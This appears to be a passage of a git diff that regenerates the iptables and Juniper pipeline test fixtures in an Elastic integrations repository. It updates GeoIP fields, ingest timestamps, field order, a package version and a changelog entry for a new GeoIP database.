@@ -578,20 +602,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 44181, @@ -622,7 +640,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195753500Z", + "ingested": "2021-12-14T14:47:01.888415458Z", "original": "Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -663,20 +681,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 64358, @@ -707,7 +719,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195757900Z", + "ingested": "2021-12-14T14:47:01.888415840Z", "original": "Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", 
@@ -771,7 +783,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195762900Z", + "ingested": "2021-12-14T14:47:01.888416213Z", "original": "Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -838,7 +850,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195767800Z", + "ingested": "2021-12-14T14:47:01.888416591Z", "original": "Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -905,7 +917,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195772100Z", + "ingested": "2021-12-14T14:47:01.888417161Z", "original": "Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -969,7 +981,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195776600Z", + "ingested": "2021-12-14T14:47:01.888417535Z", "original": "Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 ", "type": [ "denied", 
@@ -1033,7 +1045,7 @@ }, "event": { "action": "drop_input", - "ingested": "2021-12-09T13:39:42.195781600Z", + "ingested": "2021-12-14T14:47:01.888417920Z", "original": "Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 ", "type": [ "denied", @@ -1063,36 +1075,24 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, @@ -1117,7 +1117,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:39:42.195787800Z", + "ingested": "2021-12-14T14:47:01.888418313Z", "original": "Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 ", "category": [ "network" 
@@ -1173,7 +1173,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:39:42.195793700Z", + "ingested": "2021-12-14T14:47:01.888418699Z", "original": "Jan 22 10:52:34 ubuntu-bionic kernel: [ 307.757925] IN= OUT=enp0s3 MAC=90:10:12:34:56:78:90:10:aa:bb:cc:dd:86:dd:ff:ff SRC=fe80:0000:0000:0000:0084:88ff:feae:790a DST=ff02:0000:0000:0000:0000:0000:0000:0016 LEN=96 TC=0 HOPLIMIT=1 FLOWLBL=0 PROTO=ICMPv6 TYPE=143 CODE=0 MARK=0xd4", "category": [ "network" @@ -1205,20 +1205,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 48689, @@ -1258,7 +1252,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:42.195800900Z", + "ingested": "2021-12-14T14:47:01.888419227Z", "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 ", "type": [ "allowed", @@ -1334,7 +1328,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:42.195805200Z", + "ingested": "2021-12-14T14:47:01.888419617Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 ", "type": [ "allowed", 
@@ -1417,7 +1411,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:42.195810200Z", + "ingested": "2021-12-14T14:47:01.888420015Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 ", "type": [ "denied", @@ -1492,7 +1486,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:42.195816500Z", + "ingested": "2021-12-14T14:47:01.888420648Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 ", "type": [ "allowed", @@ -1567,7 +1561,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:42.195823800Z", + "ingested": "2021-12-14T14:47:01.888421047Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 ", "type": [ "allowed", diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json index 6a87be00a00..3536b05d369 100644 --- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-ubiquiti.log-expected.json 
@@ -21,20 +21,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "port": 48689, @@ -74,7 +68,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:44.256951500Z", + "ingested": "2021-12-14T14:47:03.869988957Z", "original": "Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520", "type": [ "allowed", @@ -150,7 +144,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:44.256960300Z", + "ingested": "2021-12-14T14:47:03.869991678Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0", "type": [ "allowed", @@ -233,7 +227,7 @@ }, "event": { "action": "drop", - "ingested": "2021-12-09T13:39:44.256966Z", + "ingested": "2021-12-14T14:47:03.869992099Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0", "type": [ "denied", 
@@ -308,7 +302,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:44.256969400Z", + "ingested": "2021-12-14T14:47:03.869992474Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0", "type": [ "allowed", @@ -383,7 +377,7 @@ }, "event": { "action": "accept", - "ingested": "2021-12-09T13:39:44.256973800Z", + "ingested": "2021-12-14T14:47:03.869992858Z", "original": "Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0", "type": [ "allowed", @@ -408,19 +402,6 @@ "ttl": 126, "id": 15317 }, - "destination": { - "port": 443 - }, - "source": { - "port": 59344 - }, - "message": "My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -428,13 +409,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 443 + }, + "source": { + "port": 59344 + }, + "message": "My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256978900Z", + "ingested": "2021-12-14T14:47:03.869993224Z", "original": "May 5 20:46:45 My-Office-Gateway user.info kernel: TTL=126 ID=15317 DF PROTO=TCP SPT=59344 DPT=443 WINDOW=8212 RES=0x00 ACK PSH URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { 
@@ -450,19 +444,6 @@ "ttl": 126, "id": 51392 }, - "destination": { - "port": 7914 - }, - "source": { - "port": 51653 - }, - "message": "My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -470,13 +451,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 7914 + }, + "source": { + "port": 51653 + }, + "message": "My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256983800Z", + "ingested": "2021-12-14T14:47:03.869993589Z", "original": "May 5 20:46:46 My-Office-Gateway user.info kernel: TTL=126 ID=51392 DF PROTO=TCP SPT=51653 DPT=7914 WINDOW=1024 RES=0x00 ACK PSH URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { @@ -491,19 +485,6 @@ "ttl": 126, "id": 8698 }, - "destination": { - "port": 51179 - }, - "source": { - "port": 88 - }, - "message": "My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, 
@@ -511,13 +492,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 51179 + }, + "source": { + "port": 88 + }, + "message": "My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256987700Z", + "ingested": "2021-12-14T14:47:03.869994023Z", "original": "May 5 20:46:46 My-Office-Gateway user.info kernel: L=126 ID=8698 DF PROTO=TCP SPT=88 DPT=51179 WINDOW=2053 RES=0x00 ACK URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { @@ -533,19 +527,6 @@ "ttl": 126, "id": 15461 }, - "destination": { - "port": 443 - }, - "source": { - "port": 59289 - }, - "message": "My-Office-Gateway user.info kernel: 0 TTL=126 ID=15461 DF PROTO=TCP SPT=59289 DPT=443 WINDOW=8208 RES=0x00 ACK PSH URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -553,13 +534,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 443 + }, + "source": { + "port": 59289 + }, + "message": "My-Office-Gateway user.info kernel: 0 TTL=126 ID=15461 DF PROTO=TCP SPT=59289 DPT=443 WINDOW=8208 RES=0x00 ACK PSH URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256992200Z", + "ingested": "2021-12-14T14:47:03.869994386Z", "original": "May 5 20:47:09 My-Office-Gateway user.info kernel: 0 TTL=126 ID=15461 DF PROTO=TCP SPT=59289 DPT=443 WINDOW=8208 RES=0x00 ACK PSH URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { 
@@ -574,19 +568,6 @@ "ttl": 126, "id": 8702 }, - "destination": { - "port": 51182 - }, - "source": { - "port": 88 - }, - "message": "My-Office-Gateway user.info kernel: L=126 ID=8702 DF PROTO=TCP SPT=88 DPT=51182 WINDOW=2053 RES=0x00 ACK URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, @@ -594,13 +575,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 51182 + }, + "source": { + "port": 88 + }, + "message": "My-Office-Gateway user.info kernel: L=126 ID=8702 DF PROTO=TCP SPT=88 DPT=51182 WINDOW=2053 RES=0x00 ACK URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.256996700Z", + "ingested": "2021-12-14T14:47:03.869994749Z", "original": "May 5 20:46:56 My-Office-Gateway user.info kernel: L=126 ID=8702 DF PROTO=TCP SPT=88 DPT=51182 WINDOW=2053 RES=0x00 ACK URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } }, { @@ -617,19 +611,6 @@ "ttl": 126, "id": 4622 }, - "destination": { - "port": 49209 - }, - "source": { - "port": 389 - }, - "message": "My-Office-Gateway user.info kernel: TL=126 ID=4622 DF PROTO=TCP SPT=389 DPT=49209 WINDOW=8192 RES=0x00 ECE ACK SYN URGP=0", - "tags": [ - "preserve_original_event" - ], - "network": { - "transport": "tcp" - }, "observer": { "name": "My-Office-Gateway" }, 
@@ -637,13 +618,26 @@ "ecs": { "version": "1.12.0" }, + "destination": { + "port": 49209 + }, + "source": { + "port": 389 + }, + "message": "My-Office-Gateway user.info kernel: TL=126 ID=4622 DF PROTO=TCP SPT=389 DPT=49209 WINDOW=8192 RES=0x00 ECE ACK SYN URGP=0", "event": { - "ingested": "2021-12-09T13:39:44.257000500Z", + "ingested": "2021-12-14T14:47:03.869995132Z", "original": "May 5 20:45:44 My-Office-Gateway user.info kernel: TL=126 ID=4622 DF PROTO=TCP SPT=389 DPT=49209 WINDOW=8192 RES=0x00 ECE ACK SYN URGP=0", "category": [ "network" ], "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "transport": "tcp" } } ] diff --git a/packages/iptables/manifest.yml b/packages/iptables/manifest.yml index 2a29abe83af..1330a53ddf5 100644 --- a/packages/iptables/manifest.yml +++ b/packages/iptables/manifest.yml @@ -1,6 +1,6 @@ name: iptables title: Iptables Logs -version: 0.6.1 +version: 0.6.2 release: experimental description: Collect and parse logs from iptables and ip6tables with Elastic Agent. type: integration diff --git a/packages/juniper/changelog.yml b/packages/juniper/changelog.yml index 0d92fd3d432..34a3f06f947 100644 --- a/packages/juniper/changelog.yml +++ b/packages/juniper/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.7" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.6" changes: - description: Change test public IPs to the supported subset diff --git a/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json b/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json index fba6e68bbbe..1dfe0ef2f37 100644 --- a/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/juniper/data_stream/junos/_dev/test/pipeline/test-generated.log-expected.json 
@@ -3,7 +3,7 @@ { "message": "Jan 29 06:09:59 ceroinBC.exe[6713]: RPD_SCHED_TASK_LONGRUNTIME: : exe ran for 7309(5049)", "event": { - "ingested": "2021-12-10T10:13:45.067851400Z" + "ingested": "2021-12-14T14:47:05.643310048Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "Feb 12 13:12:33 DCD_FILTER_LIB_ERROR message repeated [7608]: llu: Filter library initialization failed", "event": { - "ingested": "2021-12-10T10:13:45.067872Z" + "ingested": "2021-12-14T14:47:05.643314375Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "Feb 26 20:15:08 MIB2D_TRAP_SEND_FAILURE: restart [6747]: sum: uaerat: cancel: success", "event": { - "ingested": "2021-12-10T10:13:45.067881900Z" + "ingested": "2021-12-14T14:47:05.643315434Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "Mar 12 03:17:42 seq olorema6148.www.localdomain: fug5500.www.domain IFP trace\u003e node: dqu", "event": { - "ingested": "2021-12-10T10:13:45.067891500Z" + "ingested": "2021-12-14T14:47:05.643316242Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "Mar 26 10:20:16 ssb SNMPD_CONTEXT_ERROR: [7400]: emq: isiu: success in 6237 context 5367", "event": { - "ingested": "2021-12-10T10:13:45.067900900Z" + "ingested": "2021-12-14T14:47:05.643316874Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "Apr 9 17:22:51 RPD_KRT_IFL_CELL_RELAY_MODE_UNSPECIFIED: restart [7618]: ionul: ifl : nibus, unknown", "event": { - "ingested": "2021-12-10T10:13:45.067910Z" + "ingested": "2021-12-14T14:47:05.643317592Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "Apr 24 00:25:25 CHASSISD_SNMP_TRAP10 message repeated [1284]: ume: SNMP trap: failure: ono", "event": { - "ingested": "2021-12-10T10:13:45.067919200Z" + "ingested": "2021-12-14T14:47:05.643318250Z" }, "ecs": { "version": "1.12.0" 
@@ -87,7 +87,7 @@ { "message": "May 8 07:27:59 sunt prehen6218.www.localhost: onse.exe[254]: RPD_KRT_IFL_CELL_RELAY_MODE_INVALID: : ifl : inibusBo, failure", "event": { - "ingested": "2021-12-10T10:13:45.067928300Z" + "ingested": "2021-12-14T14:47:05.643318893Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "May 22 14:30:33 iamquis quirat6972.www5.lan: isc.exe[3237]: SNMPD_USER_ERROR: : conseq: unknown in 6404 user 'atiset' 4068", "event": { - "ingested": "2021-12-10T10:13:45.067937600Z" + "ingested": "2021-12-14T14:47:05.643319450Z" }, "ecs": { "version": "1.12.0" @@ -111,7 +111,7 @@ { "message": "Jun 5 21:33:08 fpc9 RPD_TASK_REINIT: [4621]: lita: Reinitializing", "event": { - "ingested": "2021-12-10T10:13:45.067943700Z" + "ingested": "2021-12-14T14:47:05.643323433Z" }, "ecs": { "version": "1.12.0" @@ -123,7 +123,7 @@ { "message": "Jun 20 04:35:42 fpc4 LOGIN_FAILED: [2227]: oinBC: Login failed for user quameius from host ipsumdol4488.api.localdomain", "event": { - "ingested": "2021-12-10T10:13:45.067950200Z" + "ingested": "2021-12-14T14:47:05.643324259Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "Jul 4 11:38:16 NASD_PPP_SEND_PARTIAL: restart [3994]: aper: Unable to send all of message: santiumd", "event": { - "ingested": "2021-12-10T10:13:45.067960Z" + "ingested": "2021-12-14T14:47:05.643325133Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "Jul 18 18:40:50 UI_COMMIT_AT_FAILED message repeated [7440]: temqu: success, minimav", "event": { - "ingested": "2021-12-10T10:13:45.067969400Z" + "ingested": "2021-12-14T14:47:05.643325765Z" }, "ecs": { "version": "1.12.0" @@ -159,7 +159,7 @@ { "message": "Aug 2 01:43:25 rnatur ofdeFin7811.lan: emipsumd.exe[5020]: BOOTPD_NEW_CONF: : New configuration installed", "event": { - "ingested": "2021-12-10T10:13:45.067978700Z" + "ingested": "2021-12-14T14:47:05.643326507Z" }, "ecs": { "version": "1.12.0" 
@@ -171,7 +171,7 @@ { "message": "Aug 16 08:45:59 RPD_RIP_JOIN_MULTICAST message repeated [60]: onemulla: Unable to join multicast group enp0s4292: unknown", "event": { - "ingested": "2021-12-10T10:13:45.067988100Z" + "ingested": "2021-12-14T14:47:05.643400742Z" }, "ecs": { "version": "1.12.0" @@ -183,7 +183,7 @@ { "message": "Aug 30 15:48:33 FSAD_TERMINATED_CONNECTION: restart [6703]: xea: Open file ites` closed due to unknown", "event": { - "ingested": "2021-12-10T10:13:45.067994600Z" + "ingested": "2021-12-14T14:47:05.643401843Z" }, "ecs": { "version": "1.12.0" @@ -195,7 +195,7 @@ { "message": "Sep 13 22:51:07 RPD_KRT_IFL_GENERATION message repeated [5539]: eri: ifl lo2169 generation mismatch -- unknown", "event": { - "ingested": "2021-12-10T10:13:45.068001300Z" + "ingested": "2021-12-14T14:47:05.643402803Z" }, "ecs": { "version": "1.12.0" @@ -207,7 +207,7 @@ { "message": "Sep 28 05:53:42 cfeb UI_COMMIT_ROLLBACK_FAILED: [3453]: avolu: Automatic rollback failed", "event": { - "ingested": "2021-12-10T10:13:45.068018400Z" + "ingested": "2021-12-14T14:47:05.643403274Z" }, "ecs": { "version": "1.12.0" @@ -219,7 +219,7 @@ { "message": "Oct 12 12:56:16 mquisn.exe[3993]: RMOPD_usage : failure: midest", "event": { - "ingested": "2021-12-10T10:13:45.068028Z" + "ingested": "2021-12-14T14:47:05.643403758Z" }, "ecs": { "version": "1.12.0" @@ -231,7 +231,7 @@ { "message": "Oct 26 19:58:50 undeomni.exe[4938]: RPD_ISIS_LSPCKSUM: : IS-IS 715 LSP checksum error, interface enp0s1965, LSP id tasun, sequence 3203, checksum eratv, lifetime ipsa", "event": { - "ingested": "2021-12-10T10:13:45.068037100Z" + "ingested": "2021-12-14T14:47:05.643404229Z" }, "ecs": { "version": "1.12.0" @@ -243,7 +243,7 @@ { "message": "Nov 10 03:01:24 kmd: restart ", "event": { - "ingested": "2021-12-10T10:13:45.068046400Z" + "ingested": "2021-12-14T14:47:05.643404719Z" }, "ecs": { "version": "1.12.0" 
@@ -255,7 +255,7 @@ { "message": "Nov 24 10:03:59 ever.exe[6463]: LOGIN_FAILED: : Login failed for user atq from host erspi4926.www5.test", "event": { - "ingested": "2021-12-10T10:13:45.068055500Z" + "ingested": "2021-12-14T14:47:05.643405206Z" }, "ecs": { "version": "1.12.0" @@ -267,7 +267,7 @@ { "message": "Dec 8 17:06:33 CHASSISD_MBUS_ERROR message repeated [72]: iadese: nisiu imad: management bus failed sanity test", "event": { - "ingested": "2021-12-10T10:13:45.068064400Z" + "ingested": "2021-12-14T14:47:05.643405864Z" }, "ecs": { "version": "1.12.0" @@ -279,7 +279,7 @@ { "message": "Dec 23 00:09:07 niamquis.exe[1471]: TFTPD_NAK_ERR : nak error ptatems, 357", "event": { - "ingested": "2021-12-10T10:13:45.068073800Z" + "ingested": "2021-12-14T14:47:05.643406499Z" }, "ecs": { "version": "1.12.0" @@ -291,7 +291,7 @@ { "message": "Jan 6 07:11:41 UI_DUPLICATE_UID: restart [3350]: atqu: Users naturau have the same UID olorsita", "event": { - "ingested": "2021-12-10T10:13:45.068082900Z" + "ingested": "2021-12-14T14:47:05.643406974Z" }, "ecs": { "version": "1.12.0" @@ -303,7 +303,7 @@ { "message": "Jan 20 14:14:16 piscivel.exe[4753]: TFTPD_CREATE_ERR: : check_space unknown", "event": { - "ingested": "2021-12-10T10:13:45.068092300Z" + "ingested": "2021-12-14T14:47:05.643407451Z" }, "ecs": { "version": "1.12.0" @@ -315,7 +315,7 @@ { "message": "Feb 3 21:16:50 fpc4 RPD_START: [1269]: riat: Start 181 version version built 7425", "event": { - 